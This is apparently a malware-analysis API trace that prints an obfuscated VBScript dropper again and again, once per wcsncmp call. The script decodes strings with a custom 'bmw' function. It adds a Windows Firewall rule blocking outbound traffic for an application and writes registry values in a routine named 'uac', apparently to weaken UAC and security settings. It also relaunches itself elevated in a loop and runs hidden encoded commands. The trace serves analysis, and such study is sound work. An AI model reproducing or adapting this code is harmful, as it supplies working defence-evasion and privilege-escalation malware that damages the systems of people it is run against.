bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.975] wcsncmp (_String1="criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.975] wcsncmp (_String1="riarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.976] wcsncmp (_String1="iarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.976] wcsncmp (_String1="arregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0222.976] wcsncmp (_String1="rregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & 